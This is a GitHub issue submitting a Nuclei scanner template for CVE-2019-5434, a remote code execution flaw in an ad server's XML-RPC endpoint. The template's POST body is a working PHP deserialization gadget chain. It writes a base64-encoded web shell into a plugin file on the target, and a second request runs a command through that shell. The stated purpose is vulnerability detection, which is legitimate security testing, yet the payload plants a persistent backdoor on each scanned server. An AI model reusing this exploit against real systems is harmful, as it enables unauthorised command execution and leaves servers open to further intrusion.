### ISSUE TITLE
CVE-2019-5434.yaml

### ISSUE THREAD

**Issue by mrojz** [projectdiscovery/nuclei-templates#6854]
### Nuclei Template:
```yaml
id: CVE-2019-5434

info:
  name: adserver RCE
  author: omarjezi
  severity: high
  reference: https://www.exploit-db.com/exploits/47739
  classification:
    cve-id: CVE-2019-5434

requests:
  - method: POST
    path:
      - "{{BaseURL}}/adxmlrpc.php"
    headers:
        User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
        Content-Type: "application/x-www-form-urlencoded"
    body: "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>"

  - method: GET
    path:
      - "{{BaseURL}}/plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=echo%20%27Nuclei%27"

    matchers:
    - type: regex
      regex:
        - "Nuclei"
      part: body

```

Response example: 

```html
HTTP/1.1 200 OK
Date: Mon, 06 Mar 2023 14:35:36 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 771
Vary: Accept-Encoding
Content-Type: text/xml; charset=ISO-8859-1

<?xml version="1.0" encoding="ISO-8859-1"?>
<methodResponse>
<params>
<param>
<value><struct>
<member><name>what</name>
<value><struct>
<member><name>html</name>
<value><string>&lt;div id='beacon_09ba694fd6' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'&gt;&lt;img src='http://redacted.com/adserver/www/delivery/lg.php?bannerid=0&amp;amp;campaignid=0&amp;amp;zoneid=1&amp;amp;source=dsad&amp;amp;loc=http%3A%2F%2Fredacted.com%2Fadserver%2Fadxmlrpc.php&amp;amp;cb=09ba694fd6' width='0' height='0' alt='' style='width: 0px; height: 0px;' /&gt;&lt;/div&gt;</string></value>
</member>
<member><name>bannerid</name>
<value><string></string></value>
</member>
</struct></value>
</member>
</struct></value>
</param>
</params>
</methodResponse>
```
